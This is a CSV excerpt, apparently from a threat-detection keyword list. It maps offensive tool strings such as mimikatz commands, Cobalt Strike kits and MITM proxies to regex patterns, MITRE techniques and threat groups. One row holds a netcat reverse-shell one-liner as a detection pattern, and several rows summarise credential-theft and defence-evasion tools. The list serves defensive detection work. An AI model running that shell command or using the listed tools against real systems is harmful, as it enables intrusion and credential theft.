"*misc::shadowcopies*",".{0,1000}misc\:\:shadowcopies.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52138" "*misc::skeleton*",".{0,1000}misc\:\:skeleton.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52139" "*misc::spooler*",".{0,1000}misc\:\:spooler.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52140" "*misc::taskmgr*",".{0,1000}misc\:\:taskmgr.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52141" "*misc::wp*",".{0,1000}misc\:\:wp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52142" "*misc::xor*",".{0,1000}misc\:\:xor.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52143" "*MISC_HIJACKABLE_DLL*",".{0,1000}MISC_HIJACKABLE_DLL.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","52144" "*miscbackdoorlnkhelp*",".{0,1000}miscbackdoorlnkhelp.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","52145" "*Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1*",".{0,1000}Misc\-Powershell\-Scripts\/blob\/master\/Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","52146" 
"*Misc-PowerShell-Stuff/blob/master/Invoke-TokenDuplication.ps1*",".{0,1000}Misc\-PowerShell\-Stuff\/blob\/master\/Invoke\-TokenDuplication\.ps1.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","52147" "*missile-command.txt*",".{0,1000}missile\-command\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52148" "*MisterDaneel/pysoxy*",".{0,1000}MisterDaneel\/pysoxy.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","1","N/A","N/A","10","10","149","51","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z","52149" "*MitchHS/DLL-Spoofer*",".{0,1000}MitchHS\/DLL\-Spoofer.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","1","N/A","N/A","9","1","60","7","2025-03-04T14:14:15Z","2023-10-18T14:34:38Z","52150" "*mitchmoser/SharpShares*",".{0,1000}mitchmoser\/SharpShares.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","1","N/A","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","52151" "*mitm6 --*",".{0,1000}mitm6\s\-\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - 
TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","52152" "*mitm6 -d *",".{0,1000}mitm6\s\-d\s.{0,1000}","offensive_tool_keyword","mitm6","performs MiTM for IPv6","T1547 - T1557 - T1569 - T1562 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/fox-it/mitm6","1","0","#linux","N/A","10","10","1778","256","2024-02-20T16:11:53Z","2018-01-10T21:27:28Z","52153" "*mitm6.py*",".{0,1000}mitm6\.py.{0,1000}","offensive_tool_keyword","mitm6","performs MiTM for IPv6","T1547 - T1557 - T1569 - T1562 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/fox-it/mitm6","1","1","N/A","N/A","10","10","1778","256","2024-02-20T16:11:53Z","2018-01-10T21:27:28Z","52154" "*mitmdump -*",".{0,1000}mitmdump\s\-.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","N/A","10","","N/A","","","","52155" "*mitmdump -s aerosol.py*",".{0,1000}mitmdump\s\-s\saerosol\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","52156" "*mitmdump*",".{0,1000}mitmdump.{0,1000}","offensive_tool_keyword","mitmproxy","An interactive. SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","1","#linux #windows","command-line version of mitmproxy","10","10","38814","4162","2025-04-22T13:29:41Z","2010-02-16T04:10:13Z","52157" "*MITMf.py*",".{0,1000}MITMf\.py.{0,1000}","offensive_tool_keyword","MITMf","Framework for Man-In-The-Middle attacks","T1557 - T1192 - T1173 - T1185","TA0001 - TA0011 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/MITMf","1","1","N/A","N/A","10","10","3612","1047","2018-08-28T15:44:25Z","2014-07-07T11:13:51Z","52158" "*mitmproxy*",".{0,1000}mitmproxy.{0,1000}","offensive_tool_keyword","mitmproxy","An interactive. 
SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","1","#linux #windows","N/A","10","10","38814","4162","2025-04-22T13:29:41Z","2010-02-16T04:10:13Z","52159" "*mitmproxy.rb*",".{0,1000}mitmproxy\.rb.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","52160" "*mitmsocks*",".{0,1000}mitmsocks.{0,1000}","offensive_tool_keyword","mitmsocks4j","Man-in-the-middle SOCKS Proxy","T1557 - T1563 - T1559 - T1588","TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/Akdeniz/mitmsocks4j","1","0","N/A","N/A","10","1","35","11","2013-02-14T20:42:37Z","2013-02-10T21:33:52Z","52162" "*mitmsocks4j*",".{0,1000}mitmsocks4j.{0,1000}","offensive_tool_keyword","mitmsocks4j","Man-in-the-middle SOCKS Proxy for Java","T1557 - T1563 - T1559 - T1588","TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/Akdeniz/mitmsocks4j","1","1","N/A","N/A","10","1","35","11","2013-02-14T20:42:37Z","2013-02-10T21:33:52Z","52163" "*mitmweb*",".{0,1000}mitmweb.{0,1000}","offensive_tool_keyword","mitmproxy","An interactive. 
SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","1","#linux #windows","web-based interface for mitmproxy","10","10","38814","4162","2025-04-22T13:29:41Z","2010-02-16T04:10:13Z","52164" "*mkdir dnskire/*",".{0,1000}mkdir\sdnskire\/.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","52169" "*mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc *",".{0,1000}mkfifo\s\/tmp\/f\;cat\s\/tmp\/f\|\/bin\/sh\s\-i\s2\>\&1\|nc\s.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","#linux","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","52170" "*MlCGkaacS5SRUOt*",".{0,1000}MlCGkaacS5SRUOt.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","52172" "*mlcsec/FormThief*",".{0,1000}mlcsec\/FormThief.{0,1000}","offensive_tool_keyword","FormThief","Spoofing desktop login applications with WinForms and WPF","T1204.002 - T1056.004 - T1071.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/mlcsec/FormThief","1","1","N/A","N/A","8","2","173","31","2024-02-19T22:40:09Z","2024-02-19T22:34:07Z","52173" "*mlcsec/Graphpython*",".{0,1000}mlcsec\/Graphpython.{0,1000}","offensive_tool_keyword","Graphpython","Modular 
cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","52174" "*mlcsec/SharpGraphView*",".{0,1000}mlcsec\/SharpGraphView.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","1","N/A","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","52175" "*mlcsec@proton.me*",".{0,1000}mlcsec\@proton\.me.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","#email","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","52176" "*mobaxtermfox.dll*",".{0,1000}mobaxtermfox\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","1","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","52178" "*Mobile-Security-Framework*",".{0,1000}Mobile\-Security\-Framework.{0,1000}","offensive_tool_keyword","Mobile-Security-Framework","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. 
malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1564 - T1592 - T1547 - T1562","TA0010 - TA0011 - TA0003 - TA0008","N/A","N/A","Framework","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","0","N/A","N/A","N/A","10","18450","3353","2025-03-29T17:57:28Z","2015-01-31T04:36:01Z","52179" "*Mobile-Security-Framework*",".{0,1000}Mobile\-Security\-Framework.{0,1000}","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Framework","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","N/A","10","18450","3353","2025-03-29T17:57:28Z","2015-01-31T04:36:01Z","52180" "*moc.tnetnocresubuhtig.war//:sptth*",".{0,1000}moc\.tnetnocresubuhtig\.war\/\/\:sptth.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","52181" "*MockDirUACBypass*",".{0,1000}MockDirUACBypass.{0,1000}","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. 
A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","52182" "*MockDirUACBypassDll*",".{0,1000}MockDirUACBypassDll.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","52183" "*Mockingjay_BOF.sln*",".{0,1000}Mockingjay_BOF\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","N/A","9","10","151","18","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z","52184" 
"*Mockingjay_BOF-main*",".{0,1000}Mockingjay_BOF\-main.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","N/A","9","10","151","18","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z","52185" "*mod_auth_remote.phish.htaccess*",".{0,1000}mod_auth_remote\.phish\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52186" 